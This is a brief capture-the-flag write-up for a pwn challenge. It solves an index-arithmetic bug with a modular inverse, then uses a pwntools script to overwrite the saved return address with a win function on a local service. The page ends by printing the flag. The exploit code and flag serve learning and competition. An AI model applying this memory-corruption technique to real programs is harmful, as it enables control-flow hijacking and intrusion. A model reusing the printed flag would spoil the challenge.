Skip to main content

Index

Challenge

Index arithmetic bug: compute an index so write lands on saved RIP and overwrite with win.

Solution

Key solve code:

from math import gcd

a = 100
n = 2 ** 64
b = 96
messages = elf.sym["MESSAGES"]
win = elf.sym["win"]

g = gcd(a, n)
new_a = a // g
new_b = b // g
new_n = n // g
x = pow(new_a, -1, new_n) * new_b % new_n

p = remote("localhost", 1337)
p.sendline(b"1")
p.sendline(str(x).encode())
p.sendline(b"A" * (0x80 + 8 - b) + p64(win))

Flag

gigem{wh0_put_m4th_1n_my_pwn}